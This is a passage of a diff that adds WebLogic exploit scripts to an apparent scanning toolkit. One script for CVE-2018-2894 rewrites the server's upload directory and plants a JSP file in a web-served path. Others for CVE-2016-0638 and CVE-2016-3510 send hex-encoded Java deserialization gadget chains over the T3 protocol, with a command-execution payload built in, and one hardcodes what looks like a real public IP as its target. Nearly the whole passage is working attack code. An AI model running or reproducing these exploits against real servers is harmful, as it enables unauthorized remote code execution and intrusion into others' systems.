71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00'
 payload=payload+payloadObj.decode('hex')
 payload=payload+'\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x21\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x65\x65\x72\x49\x6e\x66\x6f\x58\x54\x74\xf3\x9b\xc9\x08\xf1\x02\x00\x07\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x74\x00\x27\x5b\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\x3b\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x56\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x97\x22\x45\x51\x64\x52\x46\x3e\x02\x00\x03\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x71\x00\x7e\x00\x03\x4c\x00\x0e\x72\x65\x6c\x65\x61\x73\x65\x56\x65\x72\x73\x69\x6f\x6e\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x12\x76\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x41\x73\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x05\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x77\x02\x00\x00\x78\xfe\x00\xff\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x46\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x0b\x75\x73\x2d\x6c\x2d\x62\x72\x65\x65\x6e\x73\xa5\x3c\xaf\xf1\x00\x00\x00\x07\x00\x00\x1b\x59\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x1d\x01\x81\x40\x12\x81\x34\xbf\x42\x76\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\xa5\x3c\xaf\xf1\x00\x00\x00\x00\x00\x78'
 # adjust header for appropriate message length
 payload=struct.pack('>I',len(payload)) + payload[4:]
 print '[+] Sending payload...'
 sock.send(payload)
 data = sock.recv(2048)
 print >>sys.stderr, 'received "%s"' % data
--- a/plugins/weblogic_exp/CVE_2018_2894.py
+++ b/plugins/weblogic_exp/CVE_2018_2894.py
@@ -0,0 +1,132 @@
 #!/usr/bin/env python
 # _*_ coding:utf-8 _*_
 '''
 ____       _     _     _ _   __  __           _    
 |  _ \ __ _| |__ | |__ (_) |_|  \/  | __ _ ___| | __
 | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
 |  _ < (_| | |_) | |_) | | |_| |  | | (_| \__ \   < 
 |_| \_\__,_|_.__/|_.__/|_|\__|_|  |_|\__,_|___/_|\_\
 '''
 import re
 import sys
 import time
 import argparse
 import requests
 import traceback
 import xml.etree.ElementTree as ET
 def get_current_work_path(host):
    geturl = host + "/ws_utc/resources/setting/options/general"
    ua = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0'}
    values = []
    try:
        request = requests.get(geturl)
        if request.status_code == 404:
            exit("[-] {}  don't exists CVE-2018-2894".format(host))
        elif "Deploying Application".lower() in request.text.lower():
            print("[*] First Deploying Website Please wait a moment ...")
            time.sleep(20)
            request = requests.get(geturl, headers=ua)
        if "</defaultValue>" in request.content:
            root = ET.fromstring(request.content)
            value = root.find("section").find("options")
            for e in value:
                for sub in e:
                    if e.tag == "parameter" and sub.tag == "defaultValue":
                        values.append(sub.text)
    except requests.ConnectionError:
        exit("[-] Cannot connect url: {}".format(geturl))
    if values:
        return values[0]
    else:
        print("[-] Cannot get current work path\n")
        exit(request.content)
 def get_new_work_path(host):
    origin_work_path = get_current_work_path(host)
    works = "/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css"
    if "user_projects" in origin_work_path:
        if "\\" in origin_work_path:
            works = works.replace("/", "\\")
            current_work_home = origin_work_path[:origin_work_path.find("user_projects")] + "user_projects\\domains"
            dir_len = len(current_work_home.split("\\"))
            domain_name = origin_work_path.split("\\")[dir_len]
            current_work_home += "\\" + domain_name + works
        else:
            current_work_home = origin_work_path[:origin_work_path.find("user_projects")] + "user_projects/domains"
            dir_len = len(current_work_home.split("/"))
            domain_name = origin_work_path.split("/")[dir_len]
            current_work_home += "/" + domain_name + works
    else:
        current_work_home = origin_work_path
        print("[*] cannot handle current work home dir: {}".format(origin_work_path))
    return current_work_home
 def set_new_upload_path(host, path):
    data = {
        "setting_id": "general",
        "BasicConfigOptions.workDir": path,
        "BasicConfigOptions.proxyHost": "",
        "BasicConfigOptions.proxyPort": "80"}
    request = requests.post(host + "/ws_utc/resources/setting/options", data=data, headers=headers)
    if "successfully" in request.content:
        return True
    else:
        print("[-] Change New Upload Path failed")
        exit(request.content)
 def upload_webshell(host, uri):
    set_new_upload_path(host, get_new_work_path(host))
    files = {
        "ks_edit_mode": "false",
        "ks_password_front": password,
        "ks_password_changed": "true",
        "ks_filename": ("360sglab.jsp", upload_content)
    }
    request = requests.post(host + uri, files=files)
    response = request.text
    match = re.findall("<id>(.*?)</id>", response)
    if match:
        tid = match[-1]
        shell_path = host + "/ws_utc/css/config/keystore/" + str(tid) + "_360sglab.jsp"
        if upload_content in requests.get(shell_path, headers=headers).content:
            print("[+] {} exists CVE-2018-2894".format(host))
            print("[+] Check URL: {} ".format(shell_path))
        else:
            print("[-] {}  don't exists CVE-2018-2894".format(host))
    else:
        print("[-] {}  don't exists CVE-2018-2894".format(host))
 if __name__ == "__main__":
    start = time.time()
    password = "360sglab"
    url = "/ws_utc/resources/setting/keystore"
    parser = argparse.ArgumentParser()
    parser.add_argument("-t", dest='target', default="http://127.0.0.1:7001", type=str,
                        help="target, such as: http://example.com:7001")
    upload_content = "360sglab test"
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'X-Requested-With': 'XMLHttpRequest', }
    if len(sys.argv) == 1:
        sys.argv.append('-h')
    args = parser.parse_args()
    target = args.target
    target = target.rstrip('/')
    if "://" not in target:
        target = "http://" + target
    try:
        upload_webshell(target, url)
    except Exception as e:
        print("[-] Error: \n")
        traceback.print_exc()
--- a/plugins/weblogic_exp/init.py
+++ b/plugins/weblogic_exp/init.py
@@ -0,0 +1,10 @@
 #!/usr/bin/env python
 # _*_ coding:utf-8 _*_
 '''
 ____       _     _     _ _   __  __           _    
 |  _ \ __ _| |__ | |__ (_) |_|  \/  | __ _ ___| | __
 | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
 |  _ < (_| | |_) | |_) | | |_| |  | | (_| \__ \   < 
 |_| \_\__,_|_.__/|_.__/|_|\__|_|  |_|\__,_|___/_|\_\
 '''
--- a/plugins/weblogic_plugin.py
+++ b/plugins/weblogic_plugin.py
@@ -0,0 +1,15 @@
 #coding=utf-8
 pocs=[
    {"requests_option":"",
     "url":[],
     "params":[],
     "data":[],
     "flag":[],
     "success":"",
     "fail":"",
     "end":"",
     "admin_bursk":"",
     "username":[],
     "password":[],
     },
 ]
--- a/plugins/weblogic_poc/CVE_2015_4852.py
+++ b/plugins/weblogic_poc/CVE_2015_4852.py
--- a/plugins/weblogic_poc/CVE_2016_0638.py
+++ b/plugins/weblogic_poc/CVE_2016_0638.py
@@ -0,0 +1,68 @@
 #!/usr/bin/env python
 # _*_ coding:utf-8 _*_
 '''
 ____       _     _     _ _   __  __           _    
 |  _ \ __ _| |__ | |__ (_) |_|  \/  | __ _ ___| | __
 | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
 |  _ < (_| | |_) | |_) | | |_| |  | | (_| \__ \   < 
 |_| \_\__,_|_.__/|_.__/|_|\__|_|  |_|\__,_|___/_|\_\
 '''
 import socket
 import time
 import re
 VUL=['CVE-2016-0638']
 PAYLOAD=['aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d657373616765496d706c6b88de4d93cbd45d0c00007872001f7765626c6f6769632e6a6d732e636f6d6d6f6e2e4d657373616765496d706c69126161d04df1420c000078707a000003f728200000000000000100000578aced00057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b0200007870000000014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707371007e00007372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e001e00000002767200106a61767a0000018e612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e001e7371007e00167571007e001b00000002707571007e001b00000000740006696e766f6b657571007e001e00000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e001b7371007e0016757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b4702000078700000000174000863616c632e657865740004657865637571007e001e0000000171007e00237371007e0011737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f40000000000010770800000010000000007878767200126a6176612e6c616e672e4f766572726964650000000000000000000000787071007e003a78','aced0005737200257765626c6f6769632e636f7262612e7574696c732e4d61727368616c6c65644f626a656374592161d5f3d1dbb6020002490004686173685b00086f626a42797465737400025b427870b6f794cf757200025b42acf317f8060854e0020000787000000130aced00057372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000074000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a99020000787000000001767200106a6176612e6c616e672e53797374656d00000000000000000000007870','aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707732000a556e696361737452656600093132372e302e302e3100000000000000006ed6d97b00000000000000000000000000000078']
 VER_SIG=['weblogic.jms.common.StreamMessageImpl']
 def t3handshake(sock,server_addr):
    sock.connect(server_addr)
    sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))
    time.sleep(1)
    sock.recv(1024)
    # print 'handshake successful'
 def buildT3RequestObject(sock,rport):
    data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
    data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(rport))
    data3 = '1a7727000d3234322e323134'
    data4 = '2e312e32353461863d1d0000000078'
    for d in [data1,data2,data3,data4]:
        sock.send(d.decode('hex'))
    time.sleep(2)
    # print 'send request payload successful,recv length:%d'%(len(sock.recv(2048)))
 def sendEvilObjData(sock,data):
    payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'
    payload+=data
    payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
    payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload)
    sock.send(payload.decode('hex'))
    res = ''
    try:
        while True:
            res += sock.recv(4096)
            time.sleep(0.1)
    except Exception as e:
        pass
    return res
 def checkVul(res,server_addr,index):
    p=re.findall(VER_SIG[index], res, re.S)
    if len(p)>0:
        # print '%s:%d is vul %s'%(server_addr[0],server_addr[1],VUL[index])
        print(('[+]目标weblogic存在JAVA反序列化漏洞：{}'.format(VUL[index])))
    else:
        # print '%s:%d is not vul %s' % (server_addr[0],server_addr[1],VUL[index])
        print(('[-]目标weblogic未检测到{}'.format(VUL[index])))
 def run(rip,rport,index):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    ##打了补丁之后，会阻塞，所以设置超时时间，默认15s，根据情况自己调整
    sock.settimeout(10)
    server_addr = (rip, rport)
    t3handshake(sock,server_addr)
    buildT3RequestObject(sock,rport)
    rs=sendEvilObjData(sock,PAYLOAD[index])
    checkVul(rs,server_addr,index)
 if __name__=="__main__":
    rip = '222.85.76.240'
    rport = 80
    run(rip,rport,0)
--- a/plugins/weblogic_poc/CVE_2016_3510.py
+++ b/plugins/weblogic_poc/CVE_2016_3510.py
@@ -0,0 +1,68 @@
 #!/usr/bin/env python
 # _*_ coding:utf-8 _*_
 '''
 ____       _     _     _ _   __  __           _    
 |  _ \ __ _| |__ | |__ (_) |_|  \/  | __ _ ___| | __
 | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
 |  _ < (_| | |_) | |_) | | |_| |  | | (_| \__ \   < 
 |_| \_\__,_|_.__/|_.__/|_|\__|_|  |_|\__,_|___/_|\_\
 '''
 import socket
 import time
 import re
 VUL=['CVE-2016-3510']
 PAYLOAD=['aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d657373616765496d706c6b88de4d93cbd45d0c00007872001f7765626c6f6769632e6a6d732e636f6d6d6f6e2e4d657373616765496d706c69126161d04df1420c000078707a000003f728200000000000000100000578aced00057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b0200007870000000014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707371007e00007372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e001e00000002767200106a61767a0000018e612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e001e7371007e00167571007e001b00000002707571007e001b00000000740006696e766f6b657571007e001e00000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e001b7371007e0016757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b4702000078700000000174000863616c632e657865740004657865637571007e001e0000000171007e00237371007e0011737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f40000000000010770800000010000000007878767200126a6176612e6c616e672e4f766572726964650000000000000000000000787071007e003a78','aced0005737200257765626c6f6769632e636f7262612e7574696c732e4d61727368616c6c65644f626a656374592161d5f3d1dbb6020002490004686173685b00086f626a42797465737400025b427870b6f794cf757200025b42acf317f8060854e0020000787000000130aced00057372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000074000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a99020000787000000001767200106a6176612e6c616e672e53797374656d00000000000000000000007870','aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707732000a556e696361737452656600093132372e302e302e3100000000000000006ed6d97b00000000000000000000000000000078']
 VER_SIG=['org.apache.commons.collections.functors.InvokerTransformer']
 def t3handshake(sock,server_addr):
    sock.connect(server_addr)
    sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))
    time.sleep(1)
    sock.recv(1024)
    # print 'handshake successful'
 def buildT3RequestObject(sock,rport):
    data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
    data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(rport))
    data3 = '1a7727000d3234322e323134'
